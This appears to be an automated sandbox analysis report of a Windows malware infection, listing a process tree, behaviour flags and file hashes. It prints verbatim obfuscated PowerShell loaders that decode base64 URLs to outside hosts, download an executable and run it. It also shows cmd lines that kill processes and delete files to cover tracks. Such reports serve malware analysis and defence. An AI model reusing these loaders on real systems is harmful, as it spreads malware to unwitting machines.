C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4332 -
C:\Users\Public\tql.exe"C:\Users\Public\tql.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1056 -
C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4696 -
C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4780 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4780 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\579984367498829\\* & exit8⤵PID:2404
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 47809⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4804 -
C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4700 -
C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"7⤵
- Executes dropped EXE
PID:3912 -
C:\Users\Public\tql.exe"C:\Users\Public\tql.exe"6⤵
- Executes dropped EXE
PID:4672 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3975.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4504
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵PID:4924
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\jvidz5ty.exe2⤵PID:4716
-
C:\Windows\temp\jvidz5ty.exeC:\Windows\temp\jvidz5ty.exe3⤵
- Executes dropped EXE
PID:4704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2600 -
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3608
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
MD5
f4b5c1ebf4966256f52c4c4ceae87fb1
SHA1ca70ec96d1a65cb2a4cbf4db46042275dc75813b
SHA25688e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03
SHA51202a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e
-
MD5
f4b5c1ebf4966256f52c4c4ceae87fb1
SHA1ca70ec96d1a65cb2a4cbf4db46042275dc75813b
SHA25688e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03
SHA51202a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e
-
MD5
bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
MD5
bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
MD5
bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
MD5
02cc7b8ee30056d5912de54f1bdfc219
SHA1a6923da95705fb81e368ae48f93d28522ef552fb
SHA2561989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA5120d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5